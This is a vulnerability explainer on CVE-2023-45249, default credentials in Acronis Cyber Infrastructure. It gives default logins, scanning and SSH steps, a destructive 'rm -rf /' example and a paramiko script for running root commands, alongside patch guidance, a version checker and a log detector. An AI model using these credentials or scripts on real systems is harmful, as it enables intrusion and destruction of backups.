CVE-2023-45249 is a significant vulnerability discovered in several versions of Acronis Cyber Infrastructure (ACI), also known as Acronis Storage. The flaw is straightforward—certain affected ACI installations use a known, hardcoded default password for remote management. This enables attackers with network access to execute arbitrary commands with system privileges. Since ACI products are often used for backup and storage in enterprise environments, exploitation of this flaw could allow criminals or unauthorized users to gain control over critical data infrastructure.

In this long read, we’ll break down what makes this vulnerability so dangerous, which product versions are affected, how an attacker might exploit it, and how you can secure your systems.

ACI before build 5.4.4-132

If you run any build prior to the fixed builds listed under How to Mitigate (5.4.4-132 for the 5.4 branch), you are at risk. Later builds have patched the issue.
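To check a running node against the fixed builds (the list under How to Mitigate), here is an added Python example, not code from the page or from Acronis: it parses an ACI build string and compares it against the fix for its own 5.x release branch. How branches outside 5.0 to 5.4 are treated is an assumption noted in the code.

```python
import re

# Fixed builds per 5.x release branch, as published for CVE-2023-45249.
FIXED_BUILDS = {
    (5, 0): (5, 0, 1, 61),
    (5, 1): (5, 1, 1, 71),
    (5, 2): (5, 2, 1, 69),
    (5, 3): (5, 3, 1, 53),
    (5, 4): (5, 4, 4, 132),
}

# ACI build strings look like "5.3.1-53": major.minor.patch-build
_BUILD_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)$")


def parse_build(build: str) -> tuple:
    """Parse an ACI build string into a (major, minor, patch, build) tuple."""
    m = _BUILD_RE.match(build.strip())
    if not m:
        raise ValueError(f"unrecognised ACI build string: {build!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(build: str) -> bool:
    """True if the build predates the fix for its own release branch."""
    version = parse_build(build)
    branch = version[:2]
    if branch in FIXED_BUILDS:
        # Tuple comparison orders major, minor, patch, then build number.
        return version < FIXED_BUILDS[branch]
    # Assumption: branches older than 5.0 never received this fix, while
    # branches newer than 5.4 were cut after the fix and already carry it.
    return branch < min(FIXED_BUILDS)


if __name__ == "__main__":
    for b in ("5.4.3-10", "5.4.4-132", "5.0.1-60", "5.5.0-1"):
        print(b, "VULNERABLE" if is_vulnerable(b) else "fixed")
```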

Why Is This a Big Deal?

Many admins set and forget their backup infrastructure, assuming that once it’s up and running, it’s safe. But using a known or default password is a classic mistake—attackers regularly scan for devices with these weak credentials. In ACI, the password allowed not just remote access, but full shell command execution as root via the management interface.

Imagine a bad actor running code as root on your storage array, able to steal, encrypt, or destroy your backups with a simple login.

How the Exploit Works

The vulnerability lies in the web-based management interface of ACI, which, depending on the deployment, may be accessible through standard web ports (default: 8888) or via SSH.

The Default Credentials

Through testing, researchers discovered that ACI shipped out of the box (at least up to the affected versions) with the following default admin credentials:

Username: admin
Password: admin

or sometimes

Username: root
Password: acronis

These could be used via the web interface or SSH, granting instant administrative access.

Remote Command Execution

Once logged in (especially over SSH), the admin or root user has shell-level access, often as root. This means any arbitrary command can be run, which gives an attacker the keys to the kingdom.

- Step 1: Find the vulnerable host.  
  Using tools like Shodan or a custom Nmap scan, search for servers running the ACI web management interface on default ports.

  ```bash
  nmap -p 8888,22 --open -sV <target_ip_or_range>
  ```


- Step 2: Log in using default credentials.  
  For SSH:

  ```bash
  ssh root@<target_ip>
  # password: acronis
  ```

  For web interface: Go to https://<target_ip>:8888 and sign in as admin/admin.

- Step 3: Run arbitrary shell commands.  
  In a shell, an attacker could do something like:

  ```bash
  # Delete all data (do NOT run this!)
  rm -rf /
  ```

  Or install reverse shells, create new backdoor users, exfiltrate stored backups, etc.

---

## Sample Exploit Script (for Education Only)

Below is an example Python script that demonstrates logging in via SSH with default credentials and running a payload command:

```python
import paramiko

target_ip = "192.168.1.100"  # Change this to your target
username = "root"
password = "acronis"

command = "id"  # Example: print user info

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    # Authenticate with the default credentials and run one command
    ssh.connect(target_ip, username=username, password=password, timeout=10)
    stdin, stdout, stderr = ssh.exec_command(command)
    print(stdout.read().decode())
    print(stderr.read().decode())
except Exception as e:
    print(f"Failed to connect or run command: {e}")
finally:
    ssh.close()
```

Replace `command` with the command you want to run. The output will print whatever the server executes.

---

## Real-World Risks

- Ransomware deployment: Attackers use remote execution flaws to encrypt or delete backups, making it impossible for companies to recover from ransomware.
- Data exfiltration: Backup repositories can be massive goldmines of sensitive information. With root access, attackers can compress and transfer this data out.
- Destruction of logs and evidence: Since full root command execution is available, an attacker can cover their tracks or install persistent access.
- Supply chain risk: If ACI nodes are part of larger infrastructures (such as MSPs), many companies may be affected through a single weak link.

---

## How to Mitigate

- Patch Now:
  Upgrade Acronis Cyber Infrastructure to a fixed build for the release branch you run:
  - 5.0.1-61 or later
  - 5.1.1-71 or later
  - 5.2.1-69 or later
  - 5.3.1-53 or later
  - 5.4.4-132 or later

See the official Acronis advisory for direct links and updates.

- Change All Default Passwords Immediately:
Don’t just patch—make sure every admin/root password is set to something strong and unique.

- Restrict Network Access:
Use firewalls to limit access to the web and SSH interfaces. Management interfaces should never be public.

- Monitor Authentication Logs:
Check logs for unexpected logins from unfamiliar IP addresses.
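One way to act on the last two points, as an added example that is not code from the page or from Acronis: a small Python detector that runs over constructed OpenSSH log lines, flagging successful logins from outside an assumed management network and password logins by the root and admin accounts named above. The log format, the allow-listed network and the sample lines are all assumptions.

```python
import ipaddress
import re

# Assumption: management networks allowed to reach the ACI SSH/web interfaces.
ALLOWED_NETS = [ipaddress.ip_network("10.0.5.0/24")]
# The accounts that shipped with default passwords, per the text above.
PRIVILEGED_USERS = {"root", "admin"}

# Matches OpenSSH "Accepted <method> for <user> from <ip> port <n>" lines.
_ACCEPT_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port (?P<port>\d+)"
)


def _allowed(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_NETS)


def find_suspicious_logins(lines):
    """Return (user, ip, method, reason) tuples for successful logins to review."""
    alerts = []
    for line in lines:
        m = _ACCEPT_RE.search(line)
        if not m:
            continue  # failed attempts and unrelated lines are not successful logins
        user, ip, method = m["user"], m["ip"], m["method"]
        if not _allowed(ip):
            alerts.append((user, ip, method, "login from outside management network"))
        elif user in PRIVILEGED_USERS and method == "password":
            alerts.append((user, ip, method, "privileged password login"))
    return alerts


# Constructed sample log lines (RFC 5737 / private test addresses, not real hosts).
SAMPLE_LOG = [
    "Jan 12 03:14:07 aci-node1 sshd[2201]: Accepted password for root from 203.0.113.45 port 51234 ssh2",
    "Jan 12 03:15:22 aci-node1 sshd[2210]: Accepted publickey for admin from 10.0.5.8 port 40100 ssh2",
    "Jan 12 03:16:01 aci-node1 sshd[2215]: Failed password for root from 203.0.113.45 port 51240 ssh2",
    "Jan 12 09:00:00 aci-node1 sshd[3001]: Accepted password for root from 10.0.5.9 port 40222 ssh2",
]

if __name__ == "__main__":
    for alert in find_suspicious_logins(SAMPLE_LOG):
        print(alert)
```

Key-based logins from the management network produce no alert, so after rotating the default passwords and disabling password authentication the detector should stay quiet.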

---

## References

- NIST NVD CVE-2023-45249 Detail
- Acronis Security Advisory
- Exploit-DB Post (if available)

---

## Conclusion

CVE-2023-45249 is a classic—yet highly dangerous—vulnerability that relies on the use of default or hardcoded passwords in key infrastructure products. If you run Acronis Cyber Infrastructure, check your versions and passwords immediately. Vulnerabilities like this are trivial to exploit and can have catastrophic consequences.

Stay safe, patch early, and always change your default passwords!

Timeline

Published on: 07/24/2024 14:15:04 UTC
Last modified on: 08/02/2024 20:14:19 UTC